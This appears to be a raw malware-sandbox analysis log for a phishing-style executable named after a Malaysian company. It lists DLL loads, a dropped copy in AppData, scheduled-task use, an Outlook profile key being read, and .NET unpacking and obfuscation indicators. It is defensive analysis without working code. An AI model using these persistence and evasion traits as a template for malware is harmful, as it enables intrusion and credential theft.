Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.65b0000.5.raw.unpack, .cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.3492250.3.raw.unpack, .cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, qoqZYWktJStci6f29S.cs .Net Code: yoJfVvX4u3 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.24d1188.0.raw.unpack, .cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, qoqZYWktJStci6f29S.cs .Net Code: yoJfVvX4u3 System.Reflection.Assembly.Load(byte[])
Source: 12.2.GhrKoSGuCdvpJ.exe.32b1104.0.raw.unpack, .cs .Net Code: System.Reflection.Assembly.Load(byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_010A9C30 push esp; retf 010Ch 11_2_010A9D55
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_06929233 push es; ret 11_2_06929244
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_0703942D push edi; ret 20_2_0703942E
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe Static PE information: section name: .text entropy: 7.924386208696683
Source: GhrKoSGuCdvpJ.exe.0.dr Static PE information: section name: .text entropy: 7.924386208696683
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, HecPmJ6gFWvqumjiqv.cs High entropy of concatenated method names: 'D3uJEMNjoA', 'CcRJBr8j7f', 'w7ZJDqbEil', 'Kb4J5VccR0', 'd86JN4NVnq', 'yFXJR32HNl', 'qPoJq2OdFq', 'F6xJXSvrlm', 'dKqJG47Bjd', 'I7oJgXgVvn'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, SMh6MIRIc6OakG07pp.cs High entropy of concatenated method names: 'OmjkHs9vCX', 'F7ukJ1FjNW', 'RbRk1X7CL4', 'RoLkPpEJ0Y', 'lpckQADnKf', 'O9gkp4NJN5', 'JYaks2i9YL', 'dlHkuCtgfP', 'VoTkUmyXm7', 'T2BkeuVICG'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, uoVP2uCg0bdWUyFWjv.cs High entropy of concatenated method names: 'uYW1dLwxiV', 'vyY1WWhoOC', 'chU10QmOqd', 'Ess1Z8lZoS', 'iRR1L6qK1P', 'Cb61C0WviQ', 'uCR12ILHVs', 'HJR1kgUixu', 'yx419Q7yq0', 'oP21r4iRaE'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, sTZIxnbilXR1LmWj3Sl.cs High entropy of concatenated method names: 'm8u9aSqCN2', 'UR49OxHU1x', 'Nlk9V1JFZI', 'tH09dbXSAh', 'D9c9c0YPi8', 'ai09WVJrWG', 'EkR9lpPKlE', 'oJC90f34Qh', 'RKg9Zwib4d', 'm8g9xOnYZA'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, jy01KOzR750y1LXxEC.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Rwq9TOOtRZ', 'I5u9LImMm8', 'XEt9CPTKuL', 'wBG92qSwSi', 'iLE9k4ZdH3', 'jw099TlRgJ', 'Mpb9rFKkq0'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, t1DfyrSZWB1uISyNpZ.cs High entropy of concatenated method names: 'K9KQ7TFMnh', 'E0IQJbmwkI', 'HiEQP81RaQ', 'aMnQpxiwnm', 'r5QQs1NnXd', 'j0lPNo1WDU', 'Mb2PRvhoO2', 'Np1PqkDSZE', 'deNPXOiUQH', 'XidPGLYKSW'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, QNWvhQjrZINN7KPu3U.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'p3JYG8gFty', 'GSuYgZiR1n', 'GxUYzZna0i', 'jaYtKp9Nkw', 'n3rtM42g7l', 'OJVtY8XMNN', 'xsPtttALNb', 'E1s42BjIUtnsAMJYRHL'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, kiqa3DwVxysX4lOlBK.cs High entropy of concatenated method names: 'xl8VBKgsT', 'lG4dl9vV1', 'D8RWfMay5', 'VAelEEp3T', 'DtbZaqC94', 'CfZxk3HTM', 'Kq4VpAV4K2b2FpedVo', 'aLqKjK9J0dhueLmyJc', 'fPPkBqLY8', 'vU3rl5W7x'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, G1b9Yx2TcPUdaY9281.cs High entropy of concatenated method names: 'uWiMpHEYse', 'IbEMsFwYUM', 'wQRMUILgWl', 'bWUMecCkd4', 'RpCMLFxjHm', 'mx8MCpwa6Y', 'MnhbSl6gyXKBTqRjxf', 'Ph7hI45WRD5FMMD70y', 'rWhMM88Iyt', 'vOvMtmCp0V'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, GgAgrKJsDwJ5JIVu6G.cs High entropy of concatenated method names: 'CYdT0xQiSd', 'KQtTZ3BKEN', 'YmFT42MUS2', 'gypTbLQjw9', 'Mf7ToswUDs', 'XVTT3c4Xeb', 'HdiTn8u5IL', 'o7RTydAhKI', 'dR9T6R6wEh', 'op1Twjnngd'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, rrIrYEfBhY39sDlwNH.cs High entropy of concatenated method names: 'dWi2XKVHcf', 'fA52gvkjr1', 'pvekKY05mS', 'tZSkMcqCTm', 'bcJ2whR0UC', 'J2L2jJE5Wk', 'tau2AEFhsf', 'W2y2E4pyN1', 'oQD2B20cvM', 'cEm2DN2fmQ'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, OpG0a7BjWJqeIRfEJr.cs High entropy of concatenated method names: 'MQUpaEePsA', 'SDhpOONDfA', 'tvhpV8nsqh', 'KP2pdxnAU3', 'XUwpcrH6Uu', 'bhJpWDdZLR', 'PDOplhYHlf', 'ow7p0hlVe7', 'mtmpZGmCau', 'DXipxn90sw'
